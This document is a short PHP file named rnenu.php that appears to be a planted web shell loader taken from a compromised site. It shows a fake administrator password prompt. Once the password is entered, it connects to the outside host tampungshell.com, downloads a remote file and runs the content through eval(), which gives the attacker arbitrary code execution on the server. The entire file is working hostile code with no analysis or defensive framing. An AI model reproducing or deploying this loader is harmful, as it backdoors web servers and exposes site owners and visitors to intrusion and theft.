View File Name : rnenu.php <?php $password = '3ec10db6ba604d2402823cc0bd794cf81efb1aa0'; session_start(); if (!isset($_SESSION['loggedIn'])) { $_SESSION['loggedIn'] = false; } if (isset($_POST['password'])) { if (sha1($_POST['password']) == $password) { $_SESSION['loggedIn'] = true; } else { die ('Incorrect password'); } } if (!$_SESSION['loggedIn']): ?> <html><head><title> </title></head> <body> <p align="center"><center><font style="font-size:13px" color="#008000" face="Trebuchet MS">Enter Administrator Password <form method="post"> Password: <input type="password" name="password"> <input type="submit" name="submit" value="Go >>"> </form> </body> </html> <?php exit(); endif; ?><?php { $host = "tampungshell.com"; $port = 443; $path = "/Encode/raw.php?f=0x8z.txt"; $fp = stream_socket_client("ssl://$host:$port", $errno, $errstr, 30); if (!$fp) { echo "Error: $errstr ($errno)<br />\n"; } else { $out = "GET $path HTTP/1.1\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $content = ""; while (!feof($fp)) { $content .= fgets($fp, 128); } fclose($fp); $header_end = strpos($content, "\r\n\r\n"); if ($header_end !== false) { $content = substr($content, $header_end + 4); } eval("?>" . $content); } }